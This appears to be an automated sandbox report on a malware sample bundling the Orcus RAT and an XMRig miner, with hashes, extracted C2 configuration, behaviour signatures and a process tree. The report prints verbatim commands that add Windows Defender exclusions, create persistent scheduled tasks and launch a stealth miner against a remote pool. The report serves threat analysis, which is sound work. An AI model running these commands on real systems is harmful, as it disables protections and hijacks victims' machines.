Analysis
max time kernel: 150s
max time network: 151s
platform: windows7_x64
resource: win7v20210410
submitted: 17-07-2021 08:03
Static task: static1
Behavioral task: behavioral1
Sample: a71f91351dc1bb57f0426080f2c03854.exe
Resource: win7v20210410
General
Target: a71f91351dc1bb57f0426080f2c03854.exe
Size: 8.4MB
MD5: a71f91351dc1bb57f0426080f2c03854
SHA1: a336bd9298b0772f4d5764f695335fc7ef99755b
SHA256: f95e19a66cb1e3a612f2c07380376196e856dfefbe1038c4e6fd7d6a03388b5d
SHA512: dff5db2f6b3af11d10cb25c6e9df6df5bd4668ff54ba4ff1b6456ee7ab338e59297bad4d8722e7da15d175eabcd5833a632e5d62970d04993c733c379b7f4d19
Malware Config
Extracted
orcus
NewVPREFinal
67.242.2.35:10134
8185e643b7514e15b8dcfc7df7a8733b
autostart_method: TaskScheduler
enable_keylogger: true
install_path: %systemroot%\lsddsds\lsdds.exe
reconnect_delay: 10000
registry_keyname: lsd
taskscheduler_taskname: lsdds
watchdog_path: Temp\olsdd.exe
Signatures
Orcus Main Payload 3 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe | family_orcus
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe | family_orcus
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe | family_orcus
Looks for VirtualBox Guest Additions in registry 2 TTPs
Orcurs Rat Executable 3 IoCs
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe | orcus
C:\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe | orcus
\Users\Admin\AppData\Local\Temp\CriticalProcess\Obus.exe | orcus
XMRig Miner Payload 2 IoCs
resource | yara_rule
behavioral1/memory/2224-354-0x00000001402EB66C-mapping.dmp | xmrig
behavioral1/memory/2224-356-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
Executes dropped EXE 20 IoCs
pid | process
1952 | python.exe
1852 | dcbl.exe
1700 | ex.exe
288 | ec.exe
1688 | python.exe
1760 | frefef.exe
864 | Vu.exe
688 | Obus.exe
2732 | defendernottray.exe
3024 | trayfontdefender.exe
2860 | WindowsInput.exe
2892 | sihost64.exe
976 | WindowsInput.exe
2440 | sihost32.exe
2544 | lsdds.exe
2404 | olsdd.exe
3032 | lsdds.exe
2864 | olsdd.exe
1800 | asasasas.exe
1240 | defendernottray.exe
Looks for VMWare Tools registry key 2 TTPs
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | frefef.exe
Loads dropped DLL 16 IoCs
pid | process
2020 | a71f91351dc1bb57f0426080f2c03854.exe
2020 | a71f91351dc1bb57f0426080f2c03854.exe
2020 | a71f91351dc1bb57f0426080f2c03854.exe
2020 | a71f91351dc1bb57f0426080f2c03854.exe
1952 | python.exe
2020 | a71f91351dc1bb57f0426080f2c03854.exe
2020 | a71f91351dc1bb57f0426080f2c03854.exe
2020 | a71f91351dc1bb57f0426080f2c03854.exe
1688 | python.exe
1700 | ex.exe
288 | ec.exe
2732 | defendernottray.exe
3024 | trayfontdefender.exe
2404 | olsdd.exe
2468 | cmd.exe
2892 | sihost64.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 1 TTPs
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
7 | ip-api.com
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | frefef.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0 | frefef.exe
Drops file in System32 directory 26 IoCs
description | ioc | process
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\SysWOW64\WindowsInput.exe | Obus.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | \??\c:\windows\system32\microsoft\telemetry\sihost32.log | trayfontdefender.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | \??\c:\windows\system32\trayfontdefender.exe | ec.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | C:\Windows\SysWOW64\WindowsInput.exe.config | Obus.exe
File created | \??\c:\windows\system32\microsoft\telemetry\sihost32.exe | trayfontdefender.exe
File created | C:\Windows\SysWOW64\WindowsInput.InstallState | WindowsInput.exe
File created | \??\c:\windows\system32\microsoft\libs\sihost64.log | defendernottray.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | \??\c:\windows\system32\microsoft\libs\sihost64.exe | defendernottray.exe
File created | \??\c:\windows\system32\microsoft\libs\WR64.sys | defendernottray.exe
File opened for modification | \??\c:\windows\system32\defendernottray.exe | sihost64.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File created | \??\c:\windows\system32\defendernottray.exe | ex.exe
File opened for modification | \??\c:\windows\system32\defendernottray.exe | ex.exe
File opened for modification | \??\c:\windows\system32\trayfontdefender.exe | ec.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe
File opened for modification | \??\c:\windows\system32\microsoft\libs\WR64.sys | defendernottray.exe
Suspicious use of SetThreadContext 2 IoCs
description | pid | process | target process
PID 2732 set thread context of 2224 | 2732 | defendernottray.exe | explorer.exe
PID 1240 set thread context of 2664 | 1240 | defendernottray.exe | explorer.exe
Drops file in Windows directory 3 IoCs
description | ioc | process
File created | C:\Windows\lsddsds\lsdds.exe | Obus.exe
File opened for modification | C:\Windows\lsddsds\lsdds.exe | Obus.exe
File created | C:\Windows\lsddsds\lsdds.exe.config | Obus.exe
Detects Pyinstaller 5 IoCs
resource | yara_rule
\Users\Admin\AppData\Local\Temp\python\python.exe | pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe | pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe | pyinstaller
C:\Users\Admin\AppData\Local\Temp\python\python.exe | pyinstaller
\Users\Admin\AppData\Local\Temp\python\python.exe | pyinstaller
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash 1 IoCs
pid | pid_target | process | target process
2388 | 1760 | WerFault.exe | frefef.exe
Checks SCSI registry key(s) 3 TTPs 1 IoCs
SCSI information is often read in order to detect sandboxing environments.
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_VMware_&Prod_VMware_Virtual_S | frefef.exe
Checks processor information in registry 2 TTPs 4 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | frefef.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | frefef.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | Vu.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | Vu.exe
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
2576 | schtasks.exe
2596 | schtasks.exe
2904 | schtasks.exe
2620 | schtasks.exe
2476 | schtasks.exe
2308 | schtasks.exe
Delays execution with timeout.exe 1 IoCs
pid | process
1808 | timeout.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosInformation | frefef.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemManufacturer | frefef.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemProductName | frefef.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Logical Unit Id 0 | frefef.exe
Modifies system certificate store
description | ioc | process
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 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 | frefef.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 | defendernottray.exe
Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 | defendernottray.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | frefef.exe
Runs ping.exe 1 TTPs 1 IoCs
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid | process
1336 | powershell.exe
336 | powershell.exe
1336 | powershell.exe
336 | powershell.exe
864 | Vu.exe
864 | Vu.exe
864 | Vu.exe
1980 | powershell.exe
1980 | powershell.exe
1700 | ex.exe
2212 | powershell.exe
2212 | powershell.exe
288 | ec.exe
2356 | powershell.exe
2356 | powershell.exe
2020 | powershell.exe
2020 | powershell.exe
2492 | powershell.exe
2492 | powershell.exe
2776 | powershell.exe
2732 | defendernottray.exe
2776 | powershell.exe
3024 | trayfontdefender.exe
2388 | WerFault.exe
2388 | WerFault.exe
2388 | WerFault.exe
2388 | WerFault.exe
2388 | WerFault.exe
2388 | WerFault.exe
2388 | WerFault.exe
960 | powershell.exe
3008 | powershell.exe
960 | powershell.exe
3008 | powershell.exe
864 | Vu.exe
864 | Vu.exe
2580 | powershell.exe
2580 | powershell.exe
1852 | dcbl.exe
2584 | powershell.exe
2584 | powershell.exe
2864 | olsdd.exe
2864 | olsdd.exe
2544 | lsdds.exe
2544 | lsdds.exe
2544 | lsdds.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
2544 | lsdds.exe
2864 | olsdd.exe
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid | process
2544 | lsdds.exe
Suspicious use of AdjustPrivilegeToken 38 IoCs
description | pid | process
Token: SeDebugPrivilege | 1336 | powershell.exe
Token: SeDebugPrivilege | 864 | Vu.exe
Token: SeDebugPrivilege | 336 | powershell.exe
Token: SeDebugPrivilege | 1760 | frefef.exe
Token: SeDebugPrivilege | 1980 | powershell.exe
Token: SeDebugPrivilege | 1700 | ex.exe
Token: SeDebugPrivilege | 2212 | powershell.exe
Token: SeDebugPrivilege | 288 | ec.exe
Token: SeDebugPrivilege | 2356 | powershell.exe
Token: SeDebugPrivilege | 2020 | powershell.exe
Token: SeDebugPrivilege | 2492 | powershell.exe
Token: SeDebugPrivilege | 2776 | powershell.exe
Token: SeDebugPrivilege | 2732 | defendernottray.exe
Token: SeDebugPrivilege | 3024 | trayfontdefender.exe
Token: SeDebugPrivilege | 2388 | WerFault.exe
Token: SeDebugPrivilege | 960 | powershell.exe
Token: SeDebugPrivilege | 3008 | powershell.exe
Token: SeDebugPrivilege | 1852 | dcbl.exe
Token: SeDebugPrivilege | 2580 | powershell.exe
Token: SeDebugPrivilege | 2544 | lsdds.exe
Token: SeDebugPrivilege | 2584 | powershell.exe
Token: SeDebugPrivilege | 2404 | olsdd.exe
Token: SeDebugPrivilege | 2864 | olsdd.exe
Token: SeLockMemoryPrivilege | 2224 | explorer.exe
Token: SeLockMemoryPrivilege | 2224 | explorer.exe
Token: SeDebugPrivilege | 1800 | asasasas.exe
Token: SeDebugPrivilege | 1800 | asasasas.exe
Token: SeDebugPrivilege | 2868 | powershell.exe
Token: SeDebugPrivilege | 1396 | powershell.exe
Token: SeDebugPrivilege | 2032 | powershell.exe
Token: SeDebugPrivilege | 2796 | powershell.exe
Token: SeDebugPrivilege | 2948 | powershell.exe
Token: SeDebugPrivilege | 2632 | powershell.exe
Token: SeDebugPrivilege | 2004 | powershell.exe
Token: SeDebugPrivilege | 1708 | powershell.exe
Token: SeDebugPrivilege | 1240 | defendernottray.exe
Token: SeLockMemoryPrivilege | 2664 | explorer.exe
Token: SeLockMemoryPrivilege | 2664 | explorer.exe
Suspicious use of FindShellTrayWindow 1 IoCs
pid | process
2544 | lsdds.exe
Suspicious use of SendNotifyMessage 1 IoCs
pid | process
2544 | lsdds.exe
Suspicious use of SetWindowsHookEx 1 IoCs
pid | process
2544 | lsdds.exe
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | process | target process
PID 2020 wrote to memory of 1952 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | python.exe
PID 2020 wrote to memory of 1952 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | python.exe
PID 2020 wrote to memory of 1952 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | python.exe
PID 2020 wrote to memory of 1952 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | python.exe
PID 2020 wrote to memory of 1852 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | dcbl.exe
PID 2020 wrote to memory of 1852 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | dcbl.exe
PID 2020 wrote to memory of 1852 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | dcbl.exe
PID 2020 wrote to memory of 1852 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | dcbl.exe
PID 2020 wrote to memory of 1700 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ex.exe
PID 2020 wrote to memory of 1700 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ex.exe
PID 2020 wrote to memory of 1700 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ex.exe
PID 2020 wrote to memory of 1700 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ex.exe
PID 2020 wrote to memory of 288 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ec.exe
PID 2020 wrote to memory of 288 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ec.exe
PID 2020 wrote to memory of 288 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ec.exe
PID 2020 wrote to memory of 288 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | ec.exe
PID 1952 wrote to memory of 1688 | 1952 | python.exe | python.exe
PID 1952 wrote to memory of 1688 | 1952 | python.exe | python.exe
PID 1952 wrote to memory of 1688 | 1952 | python.exe | python.exe
PID 2020 wrote to memory of 1760 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | frefef.exe
PID 2020 wrote to memory of 1760 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | frefef.exe
PID 2020 wrote to memory of 1760 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | frefef.exe
PID 2020 wrote to memory of 1760 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | frefef.exe
PID 1700 wrote to memory of 1772 | 1700 | ex.exe | cmd.exe
PID 1700 wrote to memory of 1772 | 1700 | ex.exe | cmd.exe
PID 1700 wrote to memory of 1772 | 1700 | ex.exe | cmd.exe
PID 288 wrote to memory of 1120 | 288 | ec.exe | cmd.exe
PID 288 wrote to memory of 1120 | 288 | ec.exe | cmd.exe
PID 288 wrote to memory of 1120 | 288 | ec.exe | cmd.exe
PID 2020 wrote to memory of 864 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Vu.exe
PID 2020 wrote to memory of 864 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Vu.exe
PID 2020 wrote to memory of 864 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Vu.exe
PID 2020 wrote to memory of 864 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Vu.exe
PID 1772 wrote to memory of 1336 | 1772 | cmd.exe | powershell.exe
PID 1772 wrote to memory of 1336 | 1772 | cmd.exe | powershell.exe
PID 1772 wrote to memory of 1336 | 1772 | cmd.exe | powershell.exe
PID 1120 wrote to memory of 336 | 1120 | cmd.exe | powershell.exe
PID 1120 wrote to memory of 336 | 1120 | cmd.exe | powershell.exe
PID 1120 wrote to memory of 336 | 1120 | cmd.exe | powershell.exe
PID 2020 wrote to memory of 688 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Obus.exe
PID 2020 wrote to memory of 688 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Obus.exe
PID 2020 wrote to memory of 688 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Obus.exe
PID 2020 wrote to memory of 688 | 2020 | a71f91351dc1bb57f0426080f2c03854.exe | Obus.exe
PID 1772 wrote to memory of 1980 | 1772 | cmd.exe | powershell.exe
PID 1772 wrote to memory of 1980 | 1772 | cmd.exe | powershell.exe
PID 1772 wrote to memory of 1980 | 1772 | cmd.exe | powershell.exe
PID 864 wrote to memory of 2104 | 864 | Vu.exe | cmd.exe
PID 864 wrote to memory of 2104 | 864 | Vu.exe | cmd.exe
PID 864 wrote to memory of 2104 | 864 | Vu.exe | cmd.exe
PID 2104 wrote to memory of 2196 | 2104 | cmd.exe | chcp.com
PID 2104 wrote to memory of 2196 | 2104 | cmd.exe | chcp.com
PID 2104 wrote to memory of 2196 | 2104 | cmd.exe | chcp.com
PID 1120 wrote to memory of 2212 | 1120 | cmd.exe | powershell.exe
PID 1120 wrote to memory of 2212 | 1120 | cmd.exe | powershell.exe
PID 1120 wrote to memory of 2212 | 1120 | cmd.exe | powershell.exe
PID 2104 wrote to memory of 2264 | 2104 | cmd.exe | netsh.exe
PID 2104 wrote to memory of 2264 | 2104 | cmd.exe | netsh.exe
PID 2104 wrote to memory of 2264 | 2104 | cmd.exe | netsh.exe
PID 1772 wrote to memory of 2356 | 1772 | cmd.exe | powershell.exe
PID 1772 wrote to memory of 2356 | 1772 | cmd.exe | powershell.exe
PID 1772 wrote to memory of 2356 | 1772 | cmd.exe | powershell.exe
PID 688 wrote to memory of 2400 | 688 | Obus.exe | csc.exe
PID 688 wrote to memory of 2400 | 688 | Obus.exe | csc.exe
PID 688 wrote to memory of 2400 | 688 | Obus.exe | csc.exe
Processes
Process (level 1): C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\a71f91351dc1bb57f0426080f2c03854.exe"
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
Process (level 2): C:\Users\Admin\AppData\Local\Temp\python\python.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\python\python.exe"
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
Process (level 3): C:\Users\Admin\AppData\Local\Temp\python\python.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\python\python.exe"
- Executes dropped EXE
- Loads dropped DLL
Process (level 2): C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\AudioOutM\dcbl.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 3): C:\Windows\SysWOW64\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"' & exit
Process (level 4): C:\Windows\SysWOW64\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "asasasas" /tr '"C:\Users\Admin\AppData\Local\Temp\asasasas.exe"'
- Creates scheduled task(s)
Process (level 3): C:\Windows\SysWOW64\cmd.exe
Command line: cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp1870.tmp.bat""
- Loads dropped DLL
Process (level 4): C:\Windows\SysWOW64\timeout.exe
Command line: timeout 3
- Delays execution with timeout.exe
Process (level 4): C:\Users\Admin\AppData\Local\Temp\asasasas.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\asasasas.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
Process (level 2): C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\SecurityTrayManager\ex.exe"
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Process (level 3): C:\Windows\system32\cmd.exe
Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
- Suspicious use of WriteProcessMemory
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 3): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
Process (level 4): C:\Windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
- Creates scheduled task(s)
Process (level 3): C:\windows\system32\defendernottray.exe
Command line: "C:\windows\system32\defendernottray.exe"
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\windows\system32\cmd.exe
Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 5): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
Process (level 5): \??\c:\windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
- Creates scheduled task(s)
Process (level 4): C:\windows\system32\microsoft\libs\sihost64.exe
Command line: "C:\windows\system32\microsoft\libs\sihost64.exe"
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
Process (level 5): C:\windows\system32\defendernottray.exe
Command line: "C:\windows\system32\defendernottray.exe"
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
Process (level 6): C:\windows\system32\cmd.exe
Command line: "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 7): C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Command line: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
Process (level 6): C:\Windows\System32\cmd.exe
Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"' & exit
Process (level 7): \??\c:\windows\system32\schtasks.exe
Command line: schtasks /create /f /sc onlogon /rl highest /tn "defendernottray" /tr '"c:\windows\system32\defendernottray.exe"'
- Creates scheduled task(s)
Process (level 6): C:\Windows\explorer.exe
Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth
- Suspicious use of AdjustPrivilegeToken
Process (level 4): C:\Windows\explorer.exe
Command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=67.242.2.35:3333 --user=CMRBKYMNO --pass= --cpu-max-threads-hint=70 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6CJ80EuZhDq7w3QiPw3/9PYjASC1sXGu0nCxs9jooG2T" --cinit-idle-wait=12 --cinit-idle-cpu=90 --nicehash --cinit-stealth
- Suspicious use of AdjustPrivilegeToken
Process (level 2): C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe
Command line: "C:\Users\Admin\AppData\Local\Temp\WindowsDefenderHelper\ec.exe"
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
Process (level 3): C:\Windows\system32\cmd.exe
